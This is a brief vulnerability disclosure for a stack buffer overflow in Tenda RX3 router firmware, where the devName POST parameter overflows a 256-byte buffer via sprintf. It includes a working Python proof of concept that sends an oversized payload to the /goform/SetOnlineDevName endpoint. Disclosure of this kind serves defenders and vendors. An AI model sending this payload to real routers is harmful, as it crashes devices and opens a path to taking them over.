Overview

Affected version

RX3 Firmware V16.03.13.11_multi

Vulnerability details

In the Tenda RX3 Firmware V16.03.13.11_multi has a stack overflow vulnerability located in the formSetDeviceName function. This function accepts the devName parameter from a POST request and passes it to the set_device_name function. Within set_device_name, the array mib_vlaue is fixed at 256 bytes. However, since the user has control over the input of devName, the statement sprintf(mib_vlaue, "%s;1", dev_name); leads to a buffer overflow. The user-supplied devName can exceed the capacity of the mib_vlaue array, thus triggering this security vulnerability.

PoC

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetOnlineDevName"
payload = b"a"*2000

data = {"mac": 1,"devName": payload}
response = requests.post(url, data=data)
print(response.text)